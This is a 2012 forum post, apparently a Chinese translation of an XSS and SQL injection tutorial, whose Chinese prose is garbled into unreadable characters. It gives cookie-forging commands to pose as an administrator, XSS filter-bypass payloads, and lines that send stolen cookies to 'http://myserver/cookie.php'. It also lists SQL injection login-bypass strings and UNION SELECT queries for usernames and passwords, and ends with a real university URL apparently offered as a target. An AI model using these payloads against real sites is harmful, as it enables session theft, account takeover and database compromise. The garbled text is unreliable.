admin 2012-9-13 17:12:29

XSS & SQLע

XSS & SQLע
ߣCyberPhreak
ߣ


XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


~

ƪҽ˵йXSSԼص֪ʶ.ͨƪĵ,ϣʲôXSS,ΪʲôʹXSS,ԼʹXSS.һѧ,㽫ҪԼĴ,Ϊ˶޲˼򵥵XSS©.޲XSSһַ©,phpⰲȫƱXSS,ȡԼķ.ͬʱҽIJXSS,еwebȫ.

XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
X XSS X
X SQL Injection X
XXXXXXXXXXXXXXXXXXXX

~ʲôcookie

cookieһ.һһվ㲢עһʺ,һcookieͱԼ¼Ϣ.cookie¼ϢʹվǰǷ¼,,ͻûȷ,Ȼ¼.˵һҹܻ,һƱ,Ǿͻһſ.ԽÿζƱ.cookiesܿҪӵö.ҹֻܻܼסһ,cookiesȴܼסһ.

~&ƭ

ô֪cookieʲô...ο?ʵ,cookie༭(޸)򵥵ķ֮һ.ֻҪһ,ܹ鿴ͱ༭cookies,ֻҪһЩjavascript֪ʶ.Ȼȥһվ,¼...javascript:alert(document.cookie).ʱӦÿԿһû.Ȼվڶʹcookies,ʹsessions.ź,sessionsܱ޸(˿),cookies,һ޸һcookieͿƭԼ.ǿʼƭ...㿴һҿһЩ:

strusername=cnsst;strpassword=cnsst

ʱ֪'bitch'һԱ,㲻֪. ڴİȫ㲻Ҫ:javascript:void(document.cookie="strusername=bitch")
:javascript:alert(document.cookie).Ǽdzӽcookie޸...

~ʲôXSS

XSS,CSS,ϲƺ,XSS(CSS)ſվű.˼κηʽעű,Ҫ.ͨXSSҲԽػϢ,û,Լcookies.ⶼ,Խкܶ,ƪӦܹXSSϷԼĴ.

~ΪʲôʹXSS

Ե,ͨXSSڿͻ˺ͷִκ͵Ľű.ȻXSSȴִнű,ܽػ.:<input name="name" type="name">
ͨXSSػ,Ȼͨһļѽػ񵽵Ϣվ.һоXSSʵֵȫ.XSSܽػcookies.CookiesмֵϢ,û,ȵ.

~ǿʼɡ

Ҽٶ֪htmljavascript,php֪ʶҲа,ȴDZҪ.Ǵphpűʼ.

XSS--վű&lt;html&gt;

&lt;body&gt;

&lt;form action="" method="GET"&gt;

&lt;!-- ʹõGET,Ϊõʱϰ. --&gt;

Script: &lt;input name="name" type="name"&gt;

&lt;input type="submit" value="submit"&gt;

&lt;/form&gt;

&lt;/body&gt;

&lt;/html&gt;



&lt;?php

$name = $_GET['name'];

echo("Hello $name");

?&gt;
ƴOK,Ӧö֪Ĵʲô...һdzֵĽű,ûһ˻Լվʹ(û),Գѧԭȴĺ.õϢ:

cnsst
"Hello cnsst!"

ڵϢϢ..ע⿴,:
<script>alert(document.cookie)</script>

ôᵯdocument.cookie!XSS!

ѾXSSһ˽,.,űȡȻճ....Ҳ˵κ.?ȵ...κ...õ,ʿͻ˺ͷ˷ֱʲô? Ҹ,Ͽͻǽͻ֮ϵ:JavaScript,html, VBScriptȵ...

һ,ǽͻ֮ϵ,ڷ֮,php,aspȵ...

һЩעphp,Ժҽ˵.ܶа?עjavascript?.˵ڱдһվ,վ,ʹʹõjavascript(JS).κҲ,ΪXSSվҪеκνű.

ǿһ΢ӵ!

Ѿ<script>alert(document.cookie)</script>,һ:
scriptalert(document.cookie)/script
߿:
scriptalertdocument.cookie/script

Կ...кܶ෽ʹXSS,ֻһ.õķ֮һ.㿴е"<>"ַ" "滻.

Ǽ:
<<script>>alert(document.cookie)<</script>>

document.cookie.

ݵ:
<<script>>alert((document.cookie))<<//script>>


ǿܻ滻е,ֻ"<>".һԲִܵ,һԾͿ.,㿴:
scriptalertdocument.cookie/script
<<<script>>>alert(document.cookie)<<</script>>>

ǿ滻2ƭ,滻һЩĸ.Լķ...:
<script>alert(document.cookie)</script>

:srplert(document.cookie)srp

ϸ۲,ͻᷢdocument.cookieвûʲô滻.Ϊʲô? ΪDzҪalertʲô,Լʲô.ֻDz²,ֹֻ"<>"Լscript.ôƹ?:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

ظIJָպñ滻!߼!

ʹõȻ滻,ȴַ!:
<script>alert(document.cookie)</script>

:
scriptalert(document.cookie)script

,㼤˵,"֪ô!" OK,ǰķ¹:
<<script>>alert(document.cookie)<</script>>

:scriptalert(document.cookie)script. ʱܻӸ<>.,滻κ"<>",ٸ...˵"κ"?ʹ:

<
script
>
alert
(
document
.
cookie
)
<
/
script
>


,û滻"<>",滻ؼ.Լдһû"<>"Ĵ,Ȼ滻,Ϊʲôдԭ.Էʹøϸı׼,滻κ͵Ĵ,"alert"! ָôĽ?:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
<
/
s
c
r
i
p
t
/
>

Ӧÿ,Ȼ滻"<",2"<< >>"(κַȡdocument.cookie)

иҿʾ滻,ҽֻ㷢ԼĴ.

XSS.ǰѾ˿ͻXSS,ôھXSS.

˵֮.ͻǴ,JavaScript (JS) VBScript (VBS)ȶ.XSSͨԷ˵,php,aspȵXSS.ͻͨ鿴,ͨ鿴.

ѾѧͻXSS,DZעű.Ҫ,ҪҵһκXSSĽű,űܹXSS.,һվϷһƪ,Ҫȡ,XSS,ΪʲôӦJavaScript?Ϊʲôphp?Ҹ㿴㶫.
document.forms(0).action ="http://myserver/myscript.php
ڷҲڿͻ,ûйϵ.ĽűϢǸ,վϵһ*.txtļ.

ٴμվעһʺ,ҿԶ...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
пռԴָԶݵ,:
javascript:location.href="http://myserver/cookie.php"+document.cookie
⽫ػϵûcookie.κεط,ֻһ.

ʱһվUserAgentReferer...DOSʾ»дһһЩXSS,
telnet example.com
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
Referer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
~ʲôSQLע

SQLע,վİȫ֮һ.ôʲôSQLע?ʵҲעSQL.ھͬSQL©.һĵ¼ҳ:&lt;html&gt;

&lt;body&gt;

&lt;form action="" method="POST"&gt;

Username: &lt;input name="name" type="name"&gt;

Password: &lt;input name="password" type="password"&gt;

&lt;input type="submit" type="submit" value="Submit"&gt;

&lt;/form&gt;

&lt;/body&gt;

&lt;/html&gt;
ƴһXSS©,Dzõ,ûа취³ƽ.,Ǹô?SQLע!

򵥵Ĺû"'".ûб,ʱӦõõһϢ.õ,Ǽܹ.ǴϢ޼ֵ,֪.,һһʹõעб,ԱõһŵĴϢʱʹ.

'='
'OR 1=1--
'OR a=a--
'OR'

ԴǿȫԺ,Щעͺѷ,бȴǺܶڰȫбûע⵽:

'OR''='
'OR"="
'OR'="
'OR '="
'OR "='
'OR ''='
'OR '=''
'OR "=''
'OR ''="


~
˵UNION ALL SELECT,⽫ѡݿеһ...ʾȡѡ.
UNION ALL SELECT username,password FROM users

ѯ佫ִ,ǡ.?
UNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='

ʹַ'OR "='עڵע.ȿһ,ô֪?ʵ,㷢һSQL©,Ϣ,Ϣ˱.

һ㷢©,ͻᰴϰȥ'OR "='ķȥע,Եõ.ʱӱвѯһЩõ,ȴòѡеı,Ϊ㲢֪Ҫѯĸ.д20ͬı,ͼѯһipб:
UNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="

㿴?(ȷѾ)
http://example.com/index.php?article=34
ǽIdΪ34..."'"滻34:
http://example.com/index.php?article='


,ס˵,˶ûʶ'IJȫ,ܹԲͬע뷽,һЩ:
http://example.com/index.php?article='
http://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
http://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
http://example.com/index.php?article='OR"''='

鷢ԼĴ!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704
ҳ: [1]
鿴汾: XSS & SQLע